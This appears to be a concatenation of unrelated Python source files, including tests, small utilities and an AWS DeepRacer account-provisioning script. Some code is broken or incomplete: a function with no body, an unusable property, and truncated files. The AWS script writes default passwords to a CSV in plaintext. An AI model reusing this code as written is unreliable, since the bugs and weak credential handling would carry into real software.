# open_nti_input_syslog_lib.start_kafka()
# assert open_nti_input_syslog_lib.check_kafka_is_running()
def test_syslog_qfx_influx_01():
FNAME = 'test_syslog_qfx_01'
PCAP_FILE = FNAME + "/syslog_qfx_01_16000.pcap"
open_nti_input_syslog_lib.start_fluentd_syslog(output_influx='true')
open_nti_input_syslog_lib.replay_file(PCAP_FILE)
time.sleep(5)
db = open_nti_input_syslog_lib.get_influxdb_handle()
query = 'SELECT * FROM events'
result = db.query(query)
points = result.get_points()
assert len(list(points)) != 0
# @timeout(30)
# def test_syslog_qfx_kafka_01():
#
# FNAME = 'test_syslog_qfx_01'
# PCAP_FILE = FNAME + "/syslog_qfx_01_16000.pcap"
#
# open_nti_input_syslog_lib.start_fluentd_syslog(output_kafka='true')
# time.sleep(1)
# open_nti_input_syslog_lib.replay_file(PCAP_FILE)
#
# time.sleep(5)
#
# counter = open_nti_input_syslog_lib.check_kafka_msg()
#
# assert counter == 100
def teardown_module(module):
global c
global TCP_RELAY_CONTAINER_NAME
# if not os.getenv('TRAVIS'):
open_nti_input_syslog_lib.stop_fluentd()
open_nti_input_syslog_lib.stop_open_nti()
# open_nti_input_syslog_lib.stop_kafka()
try:
old_container_id = c.inspect_container(TCP_RELAY_CONTAINER_NAME)['Id']
c.stop(container=old_container_id)
c.remove_container(container=old_container_id)
except:
print "Container do not exit"
| nilq/baby-python | python |
import asyncio
import aiohttp
import pynws
PHILLY = (39.95, -75.16)
USERID = "testing@address.xyz"
async def example():
async with aiohttp.ClientSession() as session:
nws = pynws.SimpleNWS(*PHILLY, USERID, session)
await nws.set_station()
await nws.update_observation()
await nws.update_forecast()
await nws.update_alerts_forecast_zone()
print(nws.observation)
print(nws.forecast[0])
print(nws.alerts_forecast_zone)
loop = asyncio.get_event_loop()
loop.run_until_complete(example())
| nilq/baby-python | python |
##
# File: TimeoutDecoratorTests.py
# Author: J. Westbrook
# Date: 25-Oct-2019
# Version: 0.001
#
# Updates:
##
"""
Test cases for timeout decorator
"""
__docformat__ = "google en"
__author__ = "John Westbrook"
__email__ = "jwest@rcsb.rutgers.edu"
__license__ = "Apache 2.0"
import logging
import os
import time
import unittest
from rcsb.utils.io.decorators import timeout, timeoutMp, TimeoutException
HERE = os.path.abspath(os.path.dirname(__file__))
TOPDIR = os.path.dirname(os.path.dirname(os.path.dirname(HERE)))
logging.basicConfig(level=logging.INFO, format="%(asctime)s [%(levelname)s]-%(module)s.%(funcName)s: %(message)s")
logger = logging.getLogger()
logger.setLevel(logging.INFO)
@timeoutMp(10)
def longrunner2():
iSeconds = 20
logger.info("SLEEPING FOR %d seconds", iSeconds)
time.sleep(iSeconds)
logger.info("SLEEPING COMPLETED")
class TimeoutDecoratorTests(unittest.TestCase):
"""
Test cases for timeout decorator
"""
def setUp(self):
#
self.__startTime = time.time()
logger.debug("Starting %s at %s", self.id(), time.strftime("%Y %m %d %H:%M:%S", time.localtime()))
def tearDown(self):
endTime = time.time()
logger.debug("Completed %s at %s (%.4f seconds)", self.id(), time.strftime("%Y %m %d %H:%M:%S", time.localtime()), endTime - self.__startTime)
@timeout(10)
def __longrunner1(self, iSeconds=10):
logger.info("SLEEPING FOR %d seconds", iSeconds)
time.sleep(iSeconds)
logger.info("SLEEPING COMPLETED")
def testTimeoutSignal(self):
"""Test case - timeout decorator (signal)"""
try:
self.__longrunner1(20)
except TimeoutException as e:
logger.info("Caught timeout exception %s", str(e))
except Exception as e:
logger.exception("Failing with %s", str(e))
self.fail()
else:
logger.info("Successful completion")
@timeoutMp(10)
def __longrunner2(self, iSeconds=10):
logger.info("SLEEPING FOR %d seconds", iSeconds)
time.sleep(iSeconds)
logger.info("SLEEPING COMPLETED")
@unittest.skip("Python 3.8 macos serialization issue")
def testTimeoutMulti(self):
"""Test case - timeout decorator (multiprocessing)"""
try:
longrunner2()
except TimeoutException as e:
logger.info("Caught timeout exception %s", str(e))
except Exception as e:
logger.exception("Failing with %s", str(e))
self.fail()
else:
logger.info("Successful completion")
def suiteTimeout():
suiteSelect = unittest.TestSuite()
suiteSelect.addTest(TimeoutDecoratorTests("testTimeoutMulti"))
suiteSelect.addTest(TimeoutDecoratorTests("testTimeoutSignal"))
return suiteSelect
if __name__ == "__main__":
mySuite = suiteTimeout()
unittest.TextTestRunner(verbosity=2).run(mySuite)
| nilq/baby-python | python |
"""
Classes of config fields, description of standard models of config fields.
"""
import pprint
class DefaultConfigField:
"""Config field containing any value"""
def __init__(self, name: str, value: any = None):
self.name = name
self._value = value
@property
def value(self, value: any = None):
if value is not None:
self._value = value
return self._value
def __repr__(self):
return f"(default) {self.name}: {self.value}"
def __str__(self):
return f"(default) {self.name}: {self.value}"
class ImmutableConfigField(DefaultConfigField):
"""Immutable config field"""
def __init__(self, name: str, value: any = None):
super(ImmutableConfigField, self).__init__(name, value)
@property
def value(self, value):
if self._value is None:
self._value = value
return value
return self._value
class SecretConfigField(DefaultConfigField):
"""Config Secret (Encrypted)"""
...
| nilq/baby-python | python |
#!/usr/bin/python3
"""fsdb2many converts a single FSDB file into many, by creating
other file names based on a column of the original."""
import sys
import argparse
import pyfsdb
import re
def parse_args():
parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter,
description=__doc__,
epilog="fsdb2many -c key -o outputdir/%s.fsdb mybigfile.fsdb")
parser.add_argument("-c", "--column", default="key", type=str,
help="Column to split on")
parser.add_argument("-o", "--output-pattern",
default="fsdb2many-out-%s.fsdb",
type=str,
help="Output pattern to split on, which should contain a PERCENT S to use for inserting the column value being saved to that file.")
parser.add_argument("input_file", type=argparse.FileType('r'),
nargs='?', default=sys.stdin,
help="str")
args = parser.parse_args()
return args
def main():
args = parse_args()
# open the input file
inh = pyfsdb.Fsdb(file_handle=args.input_file)
key_column = inh.get_column_number(args.column)
out_handles = {}
for row in inh:
value = row[key_column]
# see if we have an open file handle for this one yet
if value not in out_handles:
# new value, so open a new file handle to save data for it
file_name = re.sub("[^-.0-9a-zA-Z_]", "_", str(value))
outh = pyfsdb.Fsdb(out_file=(args.output_pattern % file_name))
outh.column_names = inh.column_names
out_handles[value] = outh
# save the row to the file based on its value
out_handles[value].append(row)
# clean up
for handle in out_handles:
out_handles[handle].close()
if __name__ == "__main__":
main()
| nilq/baby-python | python |
def levenshtein(a,b):
| nilq/baby-python | python |
#!/usr/bin/env python
from twisted.web import server, resource
from twisted.internet import reactor
class HelloResource(resource.Resource):
isLeaf = True
numberRequests = 0
def render_GET(self, request):
self.numberRequests += 1
request.setHeader("content-type", "text/plain")
return "I am request #" + str(self.numberRequests) + "\n"
reactor.listenTCP(8081, server.Site(HelloResource()))
reactor.run()
| nilq/baby-python | python |
import boto3
import pprint
import time
import ast
import random
import os
import json
import botocore
import argparse
import sys
from botocore.exceptions import ClientError
def check_env_variables():
if os.environ.get('OU_NAME') is not None:
print("OU_NAME: {} is set as an environment variable.".format(os.environ.get('OU_NAME')))
else:
print('OU_NAME is NOT set as an environment variable. Exit!')
exit(1)
if os.environ.get('DEFAULT_CHILD_ACCOUNT_PASS') is not None:
print("<DEFAULT_CHILD_ACCOUNT_PASS> is set as an environment variable.")
else:
print('<DEFAULT_CHILD_ACCOUNT_PASS> is NOT set as an environment variable. Exit!')
exit(1)
if os.environ.get('BUDGET_LIMIT') is not None:
print("<BUDGET_LIMIT>: ${} is set as an environment variable.".format(os.environ.get('BUDGET_LIMIT')))
else:
print('<BUDGET_LIMIT> is NOT set as an environment variable. Exit!')
exit(1)
if os.environ.get('BUDGET_NOTIFIERS_LIST') is not None:
print("<BUDGET_NOTIFIERS_LIST>: {} is set as an environment variable.".format(os.environ.get('BUDGET_NOTIFIERS_LIST')))
else:
print("<BUDGET_NOTIFIERS_LIST> is NOT set as an environment variable. It can be as a list as comma seperated.(i.e. BUDGET_NOTIFIERS_LIST='test@gmail.com, test2@gmail.com' ).Exit!")
exit(1)
if os.environ.get('CHILD_ACCOUNT_BILLING_ACCESS') is not None:
if os.environ.get('CHILD_ACCOUNT_BILLING_ACCESS') == 'TRUE' or os.environ.get('CHILD_ACCOUNT_BILLING_ACCESS') == 'FALSE':
print("<CHILD_ACCOUNT_BILLING_ACCESS>: {} is set as an environment variable.".format(os.environ.get('CHILD_ACCOUNT_BILLING_ACCESS')))
else:
print("<CHILD_ACCOUNT_BILLING_ACCESS> is MUST set as a 'TRUE' or 'FALSE'. Exit!")
exit(1)
else:
print("<CHILD_ACCOUNT_BILLING_ACCESS> is NOT set as an environment variable. It can be 'TRUE' or 'FALSE'. Exit!")
exit(1)
def get_account_id(client, email):
paginator = client.get_paginator(
'list_accounts').paginate().build_full_result()
accounts = paginator['Accounts']
account_id= None
found = False
for account in accounts:
if str(email) == str(account['Email']):
found = True
account_id = account['Id']
print("Child account email found {} with {}".format(email,account_id))
break
if not found:
print("Child account email NOT exists:", email)
return account_id
def create_child_account(client, email, account_name, role_name, iam_user_access_to_billing):
response = client.create_account(
Email=email,
AccountName=account_name,
RoleName=role_name,
IamUserAccessToBilling=iam_user_access_to_billing
)
return response
def assume_child_credentials(client,account_id):
role_arn="arn:aws:iam::{}:role/OrganizationAccountAccessRole".format(account_id)
sesion_name="AssumeRoleSession-{}".format(random.randint(0,10000000000000000)+1)
result= None
while True:
try:
result = client.assume_role(
RoleArn=role_arn,
RoleSessionName=sesion_name,
DurationSeconds=3600
)
if result is None:
raise botocore.exceptions.ClientError
except botocore.exceptions.ClientError as err:
time.sleep(5)
response = err.response
if (response and response.get("Error", {}).get("Code") == "AccessDenied"):
print("Failed to assume role. Error:{}.It will try to assume role again!".format(err.response['Error']['Code']))
continue
break
return result['Credentials']
def exists_iam_user(iam_client,account_name):
paginator = iam_client.get_paginator(
'list_users').paginate().build_full_result()
users = paginator['Users']
iam_user_found = False;
for user in users:
if str(account_name) == str(user['UserName']):
iam_user_found= True
break
return iam_user_found
def exists_attendee_policy(iam_client,policy_name):
paginator = iam_client.get_paginator(
'list_policies').paginate().build_full_result()
policies = paginator['Policies']
iam_policy_found = False;
for policy in policies:
if str(policy_name) == str(policy['Name']):
iam_policy_found= True
break
return iam_policy_found
def create_custom_iam_userpolicy(iam_client):
policy_name = "DeepRacerWorkshopAttendeePolicy"
policy_document = json.dumps({
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": [
"iam:ChangePassword"
],
"Resource": "*"
}
]
})
create_policy_response=iam_client.create_policy(
PolicyName=policy_name,
PolicyDocument=policy_document
)
return create_policy_response['Policy']['Arn']
def attach_iam_user_policies(iam_client,account_name,custom_policy_arn):
iam_client.attach_user_policy(UserName=account_name,PolicyArn=custom_policy_arn)
iam_client.attach_user_policy(UserName=account_name,PolicyArn="arn:aws:iam::aws:policy/AWSDeepRacerFullAccess")
iam_client.attach_user_policy(UserName=account_name,PolicyArn="arn:aws:iam::aws:policy/AWSDeepRacerRoboMakerAccessPolicy")
iam_client.attach_user_policy(UserName=account_name,PolicyArn="arn:aws:iam::aws:policy/service-role/AWSDeepRacerServiceRolePolicy")
if os.environ.get('CHILD_ACCOUNT_BILLING_ACCESS') == 'TRUE':
iam_client.attach_user_policy(UserName=account_name,PolicyArn="arn:aws:iam::aws:policy/AWSBillingReadOnlyAccess")
def update_policies(account_id,iam_user_name,iam_client):
try:
iam_client.detach_user_policy(UserName=iam_user_name,
PolicyArn="arn:aws:iam::{}:policy/DeepRacerWorkshopAttendeePolicy".format(account_id)
)
print("Detached DeepRacerWorkshopAttendeePolicy from IAM User: {} in account id:{}".format(iam_user_name,account_id))
except iam_client.exceptions.NoSuchEntityException as error:
print("Policy already detached --> Message: {}".format(error))
try:
iam_client.delete_policy(PolicyArn="arn:aws:iam::{}:policy/DeepRacerWorkshopAttendeePolicy".format(account_id))
print("Deleted DeepRacerWorkshopAttendeePolicy in account id:{}".format(account_id))
except iam_client.exceptions.NoSuchEntityException as error:
print("Policy already deleted --> Message: {}".format(error))
custom_policy_arn=create_custom_iam_userpolicy(iam_client)
print("Created DeepRacerWorkshopAttendeePolicy in account id:{}".format(account_id))
attach_iam_user_policies(iam_client,iam_user_name,custom_policy_arn)
print("Attached DeepRacerWorkshopAttendeePolicy, Billing Access to IAM User:{} in account id:{}".format(iam_user_name, account_id))
def set_permissions(sts_client,account_name,account_id,default_password,type=None):
assume_creds = assume_child_credentials(sts_client,account_id)
iam_client = boto3.client('iam', region_name=os.environ['AWS_DEFAULT_REGION'] ,
aws_access_key_id=assume_creds['AccessKeyId'],
aws_secret_access_key=assume_creds['SecretAccessKey'],
aws_session_token = assume_creds['SessionToken'])
iam_user_name="{}-deepracer-{}".format(account_name,account_id)
# iam_user_name="deepraceruser-{}".format(account_id)
if type == "update" and not exists_iam_user(iam_client,iam_user_name):
print("IAM user:{} not found, NO need to update. You should first bootstrap it. Exit!".format(iam_user_name))
return
if type == "update" and exists_iam_user(iam_client,iam_user_name):
print("IAM user:{} found, It will update the policies!".format(iam_user_name))
update_policies(account_id,iam_user_name,iam_client)
return
if type == "attach" and not exists_iam_user(iam_client,iam_user_name):
print("IAM user:{} not found, NO need to attach. You should first bootstrap it. Exit!".format(iam_user_name))
return
if type == "attach" and exists_iam_user(iam_client,iam_user_name):
print("IAM user:{} found, It will attach the policies!".format(iam_user_name))
iam_client.attach_user_policy(UserName=iam_user_name,
PolicyArn="arn:aws:iam::{}:policy/DeepRacerWorkshopAttendeePolicy".format(account_id)
)
print("Attached DeepRacerWorkshopAttendeePolicy from IAM User: {} in account id:{}".format(iam_user_name,account_id))
iam_client.attach_user_policy(UserName=iam_user_name,PolicyArn="arn:aws:iam::aws:policy/AWSDeepRacerFullAccess")
print("Attached AWSDeepRacerFullAccess from IAM User: {} in account id:{}".format(iam_user_name,account_id))
iam_client.attach_user_policy(UserName=iam_user_name,PolicyArn="arn:aws:iam::aws:policy/AWSDeepRacerRoboMakerAccessPolicy")
print("Attached AWSDeepRacerRoboMakerAccessPolicy from IAM User: {} in account id:{}".format(iam_user_name,account_id))
iam_client.attach_user_policy(UserName=iam_user_name,PolicyArn="arn:aws:iam::aws:policy/service-role/AWSDeepRacerServiceRolePolicy")
print("Attached AWSDeepRacerServiceRolePolicy from IAM User: {} in account id:{}".format(iam_user_name,account_id))
if os.environ.get('CHILD_ACCOUNT_BILLING_ACCESS') == 'TRUE':
iam_client.attach_user_policy(UserName=iam_user_name,PolicyArn="arn:aws:iam::aws:policy/AWSBillingReadOnlyAccess")
print("Attached AWSBillingReadOnlyAccess from IAM User: {} in account id:{}".format(iam_user_name,account_id))
return
if type == "detach" and not exists_iam_user(iam_client,iam_user_name):
print("IAM user:{} not found, NO need to detach. You should first bootstrap it. Exit!".format(iam_user_name))
return
if type == "detach" and exists_iam_user(iam_client,iam_user_name):
try:
print("IAM user:{} found, It will detach the policies!".format(iam_user_name))
iam_client.detach_user_policy(UserName=iam_user_name,
PolicyArn="arn:aws:iam::{}:policy/DeepRacerWorkshopAttendeePolicy".format(account_id)
)
print("Detached DeepRacerWorkshopAttendeePolicy from IAM User: {} in account id:{}".format(iam_user_name,account_id))
iam_client.detach_user_policy(UserName=iam_user_name,PolicyArn="arn:aws:iam::aws:policy/AWSDeepRacerFullAccess")
print("Detached AWSDeepRacerFullAccess from IAM User: {} in account id:{}".format(iam_user_name,account_id))
iam_client.detach_user_policy(UserName=iam_user_name,PolicyArn="arn:aws:iam::aws:policy/AWSDeepRacerRoboMakerAccessPolicy")
print("Detached AWSDeepRacerRoboMakerAccessPolicy from IAM User: {} in account id:{}".format(iam_user_name,account_id))
iam_client.detach_user_policy(UserName=iam_user_name,PolicyArn="arn:aws:iam::aws:policy/service-role/AWSDeepRacerServiceRolePolicy")
print("Detached AWSDeepRacerServiceRolePolicy from IAM User: {} in account id:{}".format(iam_user_name,account_id))
if os.environ.get('CHILD_ACCOUNT_BILLING_ACCESS') == 'TRUE':
iam_client.detach_user_policy(UserName=iam_user_name,PolicyArn="arn:aws:iam::aws:policy/AWSBillingReadOnlyAccess")
print("Detached AWSBillingReadOnlyAccess from IAM User: {} in account id:{}".format(iam_user_name,account_id))
except iam_client.exceptions.NoSuchEntityException as error:
print("Policy already detached --> Message: {}".format(error))
return
if not exists_iam_user(iam_client,iam_user_name):
iam_client.create_user(UserName=iam_user_name)
print("Created IAM User:{} in account id:{}".format(iam_user_name,account_id))
custom_policy_arn=create_custom_iam_userpolicy(iam_client)
print("Created DeepRacerWorkshopAttendeePolicy in account id:{}".format(account_id))
attach_iam_user_policies(iam_client,iam_user_name,custom_policy_arn)
print("Attached DeepRacerWorkshopAttendeePolicy to IAM User:{} in account id:{}".format(iam_user_name, account_id))
iam_client.create_login_profile(UserName=iam_user_name,Password=default_password,
PasswordResetRequired=True
)
print("Created Login Profile for IAM user: {} in account id:{}".format(iam_user_name,account_id))
else:
update_policies(account_id,iam_user_name,iam_client)
credentialsOperations(account_id,iam_user_name,account_name,default_password)
def credentialsOperations(account_id,iam_user_name,account_name,default_password):
existsCred = False
with open('credentials.csv') as read_file:
datafile = read_file.readlines()
for line in datafile:
if account_id in line:
existsCred = True
break
write_file = open("credentials.csv", "a")
if not existsCred:
write_file.write("{account_name};https://{account_id}.signin.aws.amazon.com/console;{iam_user_name};{default_password}\n".format(iam_user_name=iam_user_name,account_name=account_name,account_id=account_id,default_password=default_password))
print("Account id: {} credential written to credentials.csv".format(account_id))
else:
print("Account id: {} credential already exists in credentials.csv".format(account_id))
def create_org_unit(organization_client,source_root_id,ou_name):
paginator = organization_client.get_paginator(
'list_organizational_units_for_parent').paginate(ParentId=source_root_id).build_full_result()
ous = paginator['OrganizationalUnits']
ou_found = False;
org_unit = None
for ou in ous:
if str(ou_name) == str(ou['Name']):
ou_found= True
org_unit = ou
break
if not ou_found:
response = organization_client.create_organizational_unit(
ParentId=source_root_id,
Name=ou_name,
)
print("Organization Unit:{} is created under Root id:{}".format(ou_name,source_root_id))
return response['OrganizationalUnit']
else:
print("Organization Unit:{} is Already exists under Root id:{}".format(ou_name,source_root_id))
return org_unit
def move_child_accounts_to_org_unit(organization_client,account_id,source_root_id,dest_ou_id,account_name):
paginator = organization_client.get_paginator(
'list_accounts_for_parent').paginate(ParentId=dest_ou_id).build_full_result()
child_accounts = paginator['Accounts']
is_moved = False;
for child_account in child_accounts:
if str(account_name) == str(child_account['Name']):
is_moved= True
break
if not is_moved:
organization_client.move_account(
AccountId=account_id,
SourceParentId=source_root_id,
DestinationParentId=dest_ou_id
)
print("Child Account:{} is moved to organization unit:{}".format(account_id,dest_ou_id))
else:
print("Child Account:{} is Already in organization unit:{}".format(account_id,dest_ou_id))
def set_budget_alert_for_child(sts_client,account_id,amount,budget_name,budget_notifier_list, type=None ):
print("Setting Budget Alert for child account:{}".format(budget_name))
assume_creds = assume_child_credentials(sts_client,account_id)
budgets_client = boto3.client('budgets', region_name=os.environ['AWS_DEFAULT_REGION'] ,
aws_access_key_id=assume_creds['AccessKeyId'],
aws_secret_access_key=assume_creds['SecretAccessKey'],
aws_session_token = assume_creds['SessionToken'])
budget_found= False
count = 0
while True:
if count >= 30:
break
try:
budgets = budgets_client.describe_budgets(AccountId=account_id)['Budgets']
for budget in budgets:
if budget['BudgetName'] == budget_name:
print("Budget: {} is already exists.".format(budget_name))
budget_found = True
break
except KeyError:
budget_found = False
except ClientError as e:
time.sleep(5)
count = count+1
if e.response['Error']['Code'] == 'SubscriptionRequiredException':
print("Trial:{} Failed to call Budget API. It will try again!".format(count,e.response['Error']['Code']))
continue
break
if type == "delete" and budget_found:
print("Budget: {} is exists. It will delete the budget".format(budget_name))
budgets_client.delete_budget(AccountId=account_id,BudgetName=budget_name)
return
if type == "delete" and not budget_found:
print("Budget: {} is NOT exists. No need to delete".format(budget_name))
return
if type == "update" and not budget_found:
print("Budget: {} is NOT exists. No need to update".format(budget_name))
return
if type == "update" and budget_found:
print("Budget: {} is exists. It will be deleted, then re-created".format(budget_name))
budgets_client.delete_budget(AccountId=account_id,BudgetName=budget_name)
budget_found = False
if not budget_found:
print("Budget limit: ${} for budget name:{} will be created".format(amount,budget_name))
response = budgets_client.create_budget(
AccountId=account_id,
Budget={
'BudgetName': budget_name,
'BudgetLimit': {
'Amount': str(amount),
'Unit': 'USD'
},
'CostTypes': {
'IncludeTax': True,
'IncludeSubscription': True,
'UseBlended': False,
'IncludeRefund': True,
'IncludeCredit': True,
'IncludeUpfront': True,
'IncludeRecurring': True,
'IncludeOtherSubscription': True,
'IncludeSupport': True,
'IncludeDiscount': True,
'UseAmortized': True
},
'TimeUnit': 'MONTHLY',
'BudgetType': 'COST'
},
NotificationsWithSubscribers=[
{
'Notification': {
'NotificationType': 'ACTUAL',
'ComparisonOperator': 'GREATER_THAN',
'Threshold': 80,
'ThresholdType': 'PERCENTAGE'
},
'Subscribers': budget_notifier_list
},
]
)
if response['ResponseMetadata']['HTTPStatusCode'] == 200:
print("Budget:{} is created under account id: {}".format(budget_name,account_id))
def get_root_id(organization_client):
return organization_client.list_roots()['Roots'][0]['Id']
def parse_args():
parser = argparse.ArgumentParser(description='AWS DeepRacer Account Bootstrap Script', usage='deepracer.py [<args>]')
parser.add_argument(
'-i',
'--input',
metavar="<Input-File-Name>",
nargs=1,
help='Enter the input file name(i.e. emails.csv)',required=True)
parser.add_argument(
'-m',
'--mode',
nargs=1,
help='Type the action you want to run. Available modes: <bootstrap, update-policies, attach-policies, detach-policies, update-budgets, delete-budgets> ',required=True)
args = parser.parse_args(sys.argv[1:])
return vars(args)
def bootstrap(account_id,account_name,email,source_root_id,dest_ou_id,organization_client,sts_client,default_password,amount,budget_notifier_list):
if not account_id:
print("Creating child account: {} under root account".format(account_name))
create_account_response = organization_client.create_account(
Email=email,
AccountName=account_name,
RoleName="OrganizationAccountAccessRole",
IamUserAccessToBilling="DENY"
)
count =0
while True:
describe_account_response = organization_client.describe_create_account_status(
CreateAccountRequestId=create_account_response['CreateAccountStatus']['Id']
)
if describe_account_response['CreateAccountStatus']['State'] == "SUCCEEDED":
print("Child Account: {} is created under root account".format(account_name))
break
time.sleep(3)
count = count +1
if describe_account_response['CreateAccountStatus']['State'] == "FAILED" or count > 20: # 20x3= 60 sec timeout
raise Exception("Problem occurred while creating account id")
child_account_id = get_account_id(organization_client,email)
set_permissions(sts_client,account_name,child_account_id,default_password)
budget_name="Budget-Alert-for-{}-{}".format(account_name,child_account_id)
set_budget_alert_for_child(sts_client,child_account_id,amount,budget_name,budget_notifier_list)
move_child_accounts_to_org_unit(organization_client,child_account_id,source_root_id,dest_ou_id,account_name)
else:
print("Updating permissions for existing child account: {}".format(account_name))
set_permissions(sts_client,account_name,account_id,default_password)
budget_name="Budget-Alert-for-{}-{}".format(account_name,account_id)
set_budget_alert_for_child(sts_client,account_id,amount,budget_name,budget_notifier_list)
move_child_accounts_to_org_unit(organization_client,account_id,source_root_id,dest_ou_id,account_name)
def run_mode(mode,email,budget_notifier_list,source_root_id,dest_ou_id,organization_client,sts_client):
print("------")
account_name = email.split('@')[0]
account_id = get_account_id(organization_client, email)
default_password=os.environ.get('DEFAULT_CHILD_ACCOUNT_PASS')
amount = os.environ.get('BUDGET_LIMIT')
if mode == "bootstrap":
bootstrap(account_id,account_name,email,source_root_id,dest_ou_id,organization_client,sts_client,default_password,amount,budget_notifier_list)
elif mode == "update-policies":
set_permissions(sts_client,account_name,account_id,default_password,type="update")
elif mode == "detach-policies":
set_permissions(sts_client,account_name,account_id,default_password,type="detach")
elif mode == "attach-policies":
set_permissions(sts_client,account_name,account_id,default_password,type="attach")
elif mode == "update-budgets":
budget_name="Budget-Alert-for-{}-{}".format(account_name,account_id)
set_budget_alert_for_child(sts_client,account_id,amount,budget_name,budget_notifier_list,type="update")
elif mode == "delete-budgets":
budget_name="Budget-Alert-for-{}-{}".format(account_name,account_id)
set_budget_alert_for_child(sts_client,account_id,amount,budget_name,budget_notifier_list, type="delete")
else:
print("No available modes found. Please enter Available modes: <bootstrap, update-policies, attach-policies, detach-policies, update-budgets, delete-budgets>")
exit(1)
if __name__ == '__main__':
args = parse_args()
mode = args.get('mode')[0]
file_name = args.get('input')[0]
check_env_variables()
organization_client = boto3.client('organizations')
sts_client = boto3.client('sts')
budget_notifier_list = [notifier.replace(" ","") for notifier in os.environ.get("BUDGET_NOTIFIERS_LIST").split(',')]
budget_notifier_list = [{'SubscriptionType': 'EMAIL','Address': notifier } for notifier in budget_notifier_list]
if len(budget_notifier_list) > 10:
print("Maximum 10 emails are supported for budget notifier in 'BUDGET_NOTIFIERS_LIST' environment variable.")
exit(1)
ou_name = os.environ.get('OU_NAME')
source_root_id = get_root_id(organization_client)
dest_ou_id= create_org_unit(organization_client,source_root_id,ou_name)['Id']
print("Source root id:'{}', Dest OU ID: '{}' \n".format(source_root_id,dest_ou_id))
emailfile = open(file_name, 'r')
emaillist = [l for l in (line.strip() for line in emailfile) if l]
for email in emaillist:
run_mode(mode,email,budget_notifier_list,source_root_id,dest_ou_id,organization_client,sts_client)
| nilq/baby-python | python |
"""
Tests whether the PipelineExecutor works
"""
import os
from inspect import cleandoc
import networkx
from testfixtures import compare
from mlinspect.instrumentation.dag_node import CodeReference
from mlinspect.utils import get_project_root
from mlinspect.instrumentation import pipeline_executor
from ..utils import get_expected_dag_adult_easy_py, get_expected_dag_adult_easy_ipynb, \
get_pandas_read_csv_and_dropna_code
FILE_PY = os.path.join(str(get_project_root()), "test", "pipelines", "adult_easy.py")
FILE_NB = os.path.join(str(get_project_root()), "test", "pipelines", "adult_easy.ipynb")
def test_pipeline_executor_py_file(mocker):
"""
Tests whether the PipelineExecutor works for .py files
"""
pipeline_executor.singleton = pipeline_executor.PipelineExecutor()
before_call_used_value_spy = mocker.spy(pipeline_executor, 'before_call_used_value')
before_call_used_args_spy = mocker.spy(pipeline_executor, 'before_call_used_args')
before_call_used_kwargs_spy = mocker.spy(pipeline_executor, 'before_call_used_kwargs')
after_call_used_spy = mocker.spy(pipeline_executor, 'after_call_used')
extracted_dag = pipeline_executor.singleton.run(None, FILE_PY, None, []).dag
expected_dag = get_expected_dag_adult_easy_py()
assert networkx.to_dict_of_dicts(extracted_dag) == networkx.to_dict_of_dicts(expected_dag)
assert before_call_used_value_spy.call_count == 11
assert before_call_used_args_spy.call_count == 15
assert before_call_used_kwargs_spy.call_count == 14
assert after_call_used_spy.call_count == 15
def test_pipeline_executor_nb_file(mocker):
"""
Tests whether the PipelineExecutor works for .ipynb files
"""
pipeline_executor.singleton = pipeline_executor.PipelineExecutor()
before_call_used_value_spy = mocker.spy(pipeline_executor, 'before_call_used_value')
before_call_used_args_spy = mocker.spy(pipeline_executor, 'before_call_used_args')
before_call_used_kwargs_spy = mocker.spy(pipeline_executor, 'before_call_used_kwargs')
after_call_used_spy = mocker.spy(pipeline_executor, 'after_call_used')
extracted_dag = pipeline_executor.singleton.run(FILE_NB, None, None, []).dag
expected_dag = get_expected_dag_adult_easy_ipynb()
assert networkx.to_dict_of_dicts(extracted_dag) == networkx.to_dict_of_dicts(expected_dag)
assert before_call_used_value_spy.call_count == 11
assert before_call_used_args_spy.call_count == 15
assert before_call_used_kwargs_spy.call_count == 14
assert after_call_used_spy.call_count == 15
def test_pipeline_executor_function_call_info_extraction():
"""
Tests whether the capturing of module information works
"""
test_code = get_pandas_read_csv_and_dropna_code()
pipeline_executor.singleton = pipeline_executor.PipelineExecutor()
pipeline_executor.singleton.run(None, None, test_code, [])
expected_module_info = {CodeReference(5, 13, 5, 85): ('posixpath', 'join'),
CodeReference(5, 26, 5, 49): ('builtins', 'str'),
CodeReference(5, 30, 5, 48): ('mlinspect.utils', 'get_project_root'),
CodeReference(6, 11, 6, 34): ('pandas.io.parsers', 'read_csv'),
CodeReference(7, 7, 7, 24): ('pandas.core.frame', 'dropna')}
compare(pipeline_executor.singleton.code_reference_to_module, expected_module_info)
def test_pipeline_executor_function_subscript_index_info_extraction():
"""
Tests whether the capturing of module information works
"""
test_code = cleandoc("""
import os
import pandas as pd
from mlinspect.utils import get_project_root
train_file = os.path.join(str(get_project_root()), "test", "data", "adult_train.csv")
raw_data = pd.read_csv(train_file, na_values='?', index_col=0)
data = raw_data.dropna()
data['income-per-year']
""")
pipeline_executor.singleton = pipeline_executor.PipelineExecutor()
pipeline_executor.singleton.run(None, None, test_code, [])
expected_module_info = {CodeReference(5, 13, 5, 85): ('posixpath', 'join'),
CodeReference(5, 26, 5, 49): ('builtins', 'str'),
CodeReference(5, 30, 5, 48): ('mlinspect.utils', 'get_project_root'),
CodeReference(6, 11, 6, 62): ('pandas.io.parsers', 'read_csv'),
CodeReference(7, 7, 7, 24): ('pandas.core.frame', 'dropna'),
CodeReference(8, 0, 8, 23): ('pandas.core.frame', '__getitem__')}
compare(pipeline_executor.singleton.code_reference_to_module, expected_module_info)
| nilq/baby-python | python |
# Copyright (c) 2016 Stratoscale, Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from cinder.api.contrib import volume_manage as volume_manage_v2
from cinder.api.openstack import wsgi
from cinder import exception
class VolumeManageController(volume_manage_v2.VolumeManageController):
def _ensure_min_version(self, req, allowed_version):
version = req.api_version_request
if not version.matches(allowed_version, None):
raise exception.VersionNotFoundForAPIMethod(version=version)
@wsgi.response(202)
def create(self, req, body):
self._ensure_min_version(req, "3.8")
return super(VolumeManageController, self).create(req, body)
@wsgi.extends
def index(self, req):
"""Returns a summary list of volumes available to manage."""
self._ensure_min_version(req, "3.8")
return super(VolumeManageController, self).index(req)
@wsgi.extends
